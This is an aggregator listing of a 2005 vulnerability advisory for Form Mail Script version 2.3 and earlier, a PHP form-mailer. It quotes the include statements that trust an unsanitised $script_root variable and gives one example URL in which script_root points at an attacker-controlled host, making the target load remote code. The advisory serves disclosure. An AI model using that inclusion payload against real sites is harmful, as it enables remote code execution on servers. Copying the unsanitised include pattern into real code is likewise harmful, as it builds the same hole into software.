Lucene search
formmail23.txt
🗓️ 07 Mar 2005 00:00:00Reported by Filip GroszynskiType 
packetstorm🔗 packetstormsecurity.com👁 28 Views
Form Mail Script version 2.3 has vulnerabilities due to risky include settings and configurations.
Show more
`
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Name: Form Mail Script (FS)
Version: <= 2.3 (free/commercial)
Homepage: http://www.stadtaus.com/
Author: Filip Groszynski (VXSfx)
Date: 4 March 2005
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
Vulnerable code in inc/formmail.inc.php:
...
/*****************************************************
** Include functions
*****************************************************/
include $script_root . 'inc/functions.inc.php';
include $script_root . 'inc/template.class.inc.php';
include $script_root . 'inc/template.ext.class.inc.php';
include $script_root . 'inc/formmail.class.inc.php';
...
include $script_root . 'languages/language.' . $language . '.inc.php';
...
--------------------------------------------------------
Example:
if register_globals=on and allow_url_fopen=on:
http://[victim]/[dir]/inc/formmail.inc.php?script_root=http://[hacker_box]/
--------------------------------------------------------
Fix and Vendor status:
Vendor has been notified.
--------------------------------------------------------
Contact:
Author: Filip Groszynski <VXSfx>
Location: Poland <Warsaw>
Email: groszynskif <at> gmail <dot> com
HP: http://shell.homeunix.org
-- == -- == -- == -- == -- == -- == -- == -- == -- == --
`
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo07 Mar 2005 00:00Current
7.4High risk
Vulners AI Score7.4